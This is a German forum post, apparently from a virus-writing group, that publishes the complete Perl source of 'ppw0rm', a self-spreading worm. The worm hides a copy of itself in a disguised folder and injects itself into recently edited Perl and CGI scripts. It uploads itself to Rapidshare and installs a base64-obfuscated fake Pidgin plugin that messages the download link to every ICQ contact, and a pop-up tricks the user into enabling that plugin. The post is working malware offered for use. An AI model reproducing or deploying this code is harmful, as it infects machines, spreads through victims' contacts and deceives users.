[+]Topic: Code
[+]Von: Perforin
[+]Return: Code
ppw0rm ist ein *NIX Wurm der sich über Pidgin verbreitet! Dazu nutzt er
das Pidgin Perl Interface um sich zu verbreiten. Zuerst wird der User dazu
aufgefordert, das Plugin zu aktivieren. Dann verbreitet sich der Wurm über
alle ICQ Kontakte. Dazu schickt er jedem einen Rapidshare DL Link. Natürlich
wird bei jedem ausführen, der Wurm erneut auf rapidshare geupped!
#!/usr/bin/perl
# ppw0rm - by Perforin [VXnetw0rk]
use Digest::MD5("md5_hex");
use MIME::Base64;
use Fcntl;
use File::Basename;
use IO::Socket;
if ($^O =~ m/linux/i) { linux(); } else { print "If you don't trust anybody with anything at all, why bother interacting with them?\n"; }
sub linux {
($file,$maxbufsize,$cursorsize) = ($0,64000,0);
($/,$size,$filename) = (undef,-s $file,basename($file));
($exe) = ('exec("/home/$ENV{\'LOGNAME\'}/.purpIe/pidgin-plugin-core.pl");');
open(FH,"<",$file);
$filecontent = ;
close(FH);
mkdir("$ENV{'HOME'}/.purpIe",0777);
open(hide,">","/home/$ENV{'LOGNAME'}/.purpIe/pidgin-plugin-core.pl");
print hide $filecontent;
close(hide);
open(GY,"<","/home/$ENV{'LOGNAME'}/.config/geany/geany.conf") || pspread();
while () { if ($_ =~ m/recent_files=(.*)/i) { $GYR = $1; } }
close(GY);
@gyrfiles = split(/\;/,$GYR);
foreach $ipath (@gyrfiles) {
if ($ipath =~ m/\w*\.(pl|cgi)$/i) {
open(IPATHFILE,"<",$ipath);
@ipathline = ;
close(IPATHFILE);
open(infected,">",$ipath);
foreach $line (@ipathline) {
print infected $line;
if ($line =~ m/\s{1,10}/) {
$injection_counter++;
if ($injection_counter == 1) { print infected $exe . "\n"; }
}
}
close(infected);
undef($injection_counter);
}
}
pspread();
}
sub pspread {
$md5hex = uc(md5_hex($filecontent));
$size2 = length($filecontent);
unless ($size == $size2) { die exit; }
$socket = IO::Socket::INET->new(PeerAddr => "rapidshare.com:80");
print $socket "GET /cgi-bin/rsapi.cgi?sub=nextuploadserver_v1 HTTP/1.0\r\n\r\n";
($uploadserver) = <$socket> =~ /\r\n\r\n(\d+)/;
unless ($uploadserver) { die exit; }
sysopen($fh, $file, O_RDONLY) || die exit;
$socket = IO::Socket::INET->new(PeerAddr => "rs$uploadserver" . "l3" . ".rapidshare.com:80");
$boundary = "---------------------632865735RS4EVER5675865";
$contentheader .= "$boundary\r\nContent-Disposition: form-data; name=\"rsapi_v1\"\r\n\r\n1\r\n";
$contentheader .= "$boundary\r\nContent-Disposition: form-data; name=\"filecontent\"; filename=\"$filename\"\r\n\r\n";
$contenttail = "\r\n$boundary--\r\n";
$contentlength = length($contentheader) + $size + length($contenttail);
$header = "POST /cgi-bin/upload.cgi HTTP/1.0\r\nContent-Type: multipart/form-data; boundary=$boundary\r\nContent-Length: $contentlength\r\n\r\n";
print $socket "$header$contentheader";
while ($cursize < $size) {
$bufferlen = sysread($fh, $buffer, $maxbufsize, 0) || 0;
unless ($bufferlen) { die exit; }
$cursize += $bufferlen;
print $socket $buffer;
}
print $socket $contenttail;
($result) = <$socket> =~ /\r\n\r\n(.+)/s;
unless ($result) { die exit; }
foreach (split(/\n/, $result)) { if ($_ =~ /([^=]+)=(.+)/) { $key_val{$1} = $2 } }
if ($md5hex ne $key_val{"File1.4"}) { die exit; }
$DL_URL = $key_val{"File1.1"};
open(PC,">","/home/$ENV{'LOGNAME'}/.purple/plugins/plugin-core.pl") || print "If you don't trust anybody with anything at all, why bother interacting with them?\n";
print PC decode_base64("
IyEvdXNyL2Jpbi9wZXJsDQogdXNlIFBpZGdpbjsNCiANCiVQTFVHSU5fSU5GTyA9ICgNCiAgICBw
ZXJsX2FwaV92ZXJzaW9uID0+IDIsDQogICAgbmFtZSA9PiAiUGlkZ2luIENvcmUiLA0KICAgIHZl
cnNpb24gPT4gIjEuMCIsDQogICAgc3VtbWFyeSA9PiAiUGlkZ2luIGNvcmUgcGx1Z2lucy4gVGhp
cyBwbHVnaW4gbXVzdCBiZSBlbmFibGVkIHRvIHVzZSBhbnkgb3RoZXIgcGx1Z2luISIsDQogICAg
ZGVzY3JpcHRpb24gPT4gIlBpZGdpbiBjb3JlIHBsdWdpbiB0byBlbmFibGUgb3RoZXIgcGx1Z2lu
cyB0byBsb2FkLiIsDQogICAgYXV0aG9yID0+ICJ3MzIucGVyZm9yaW5cQGdtYWlsLmNvbSIsDQog
ICAgdXJsID0+ICJodHRwOi8vcGlkZ2luLmltIiwNCiAgICBsb2FkID0+ICJwbHVnaW5fbG9hZCIs
DQogICAgdW5sb2FkID0+ICJwbHVnaW5fdW5sb2FkIg0KKTsNCg0Kc3ViIHBsdWdpbl9pbml0IHsg
cmV0dXJuICVQTFVHSU5fSU5GTzsgfQ0KDQpzdWIgcGx1Z2luX2xvYWQgew0KDQpvcGVuKGFjY291
bnRzLCI8IiwiL2hvbWUvJEVOVnsnTE9HTkFNRSd9Ly5wdXJwbGUvYWNjb3VudHMueG1sIikgfHwg
ZGllICJDcml0aWNhbCBmYWlsdXJlIVxuIjsNCndoaWxlICg8YWNjb3VudHM+KSB7IGlmICgkXyA9
fiBtLzxuYW1lPihcZCopPFwvbmFtZT4vaSkgeyAkYWNjb3VudF9uYW1lID0gJDE7IH0gfQ0KY2xv
c2UoYWNjb3VudHMpOw0Kb3BlbihibGlzdCwiPCIsIi9ob21lLyRFTlZ7J0xPR05BTUUnfS8ucHVy
cGxlL2JsaXN0LnhtbCIpIHx8IGRpZSAiV2FybmluZyBmaWxlIG5vdCBmb3VuZCFcbiI7DQp3aGls
ZSAoPGJsaXN0PikgeyBpZiAoJF8gPX4gbS88bmFtZT4oXGQqKTxcL25hbWU+L2kpIHsgcHVzaChA
SUNRLCQxKTsgfSB9DQpjbG9zZShibGlzdCk7DQoNCiRwbHVnaW4gPSBzaGlmdDsNCiRhY2MgPSBQ
dXJwbGU6OkFjY291bnRzOjpmaW5kKCRhY2NvdW50X25hbWUsICJwcnBsLWljcSIpOw0KIGZvcmVh
Y2ggJFVJTiAoQElDUSkgew0KICAgICRjb252MSA9IFB1cnBsZTo6Q29udmVyc2F0aW9uLT5uZXco
MSwgJGFjYywgJFVJTik7DQogICAgaWYgKCRjb252MSkgeyBwcmludCAib2suXG4iOyB9IGVsc2Ug
eyBwcmludCAiZmFpbC5cbiI7IH0NCiAgICAkaW0gPSAkY29udjEtPmdldF9pbV9kYXRhKCk7DQog
ICAgaWYgKCRpbSkgeyBwcmludCAib2suXG4iOyB9IGVsc2UgeyBwcmludCAiZmFpbC5cbiI7IH0=
") . "\n" . "\$im->send(\"WTF -> $DL_URL This is a must have pidgin plugin!\");" . "\n" . decode_base64("
ICAgICRjb252MS0+ZGVzdHJveSgpOw0KICB9DQp9DQoNCnN1YiBwbHVnaW5fdW5sb2FkIHsNCiAg
ICBteSAkcGx1Z2luID0gc2hpZnQ7DQogICAgUHVycGxlOjpEZWJ1Zzo6aW5mbygiUGlkZ2luIGNv
cmUgcGx1Z2luIiwgInBsdWdpbl91bmxvYWQoKSAtIFBpZGdpbiBjb3JlIHBsdWdpbiB1bmxvYWRl
ZC5cbiIpOw0KfQ0K");
close(PC);
open(MSG,">","/home/$ENV{'LOGNAME'}/.purpIe/txt.msg") || print "Please activate <> by yourself\nin the plugin section of pidgin.\nPress CTRL + U to get there!";
print MSG <<"MSG";
Please activate <> by yourself
in the plugin section of pidgin.
Press CTRL + U to get there!
MSG
close(MSG);
system("xmessage -center -file /home/$ENV{'LOGNAME'}/.purpIe/txt.msg");
}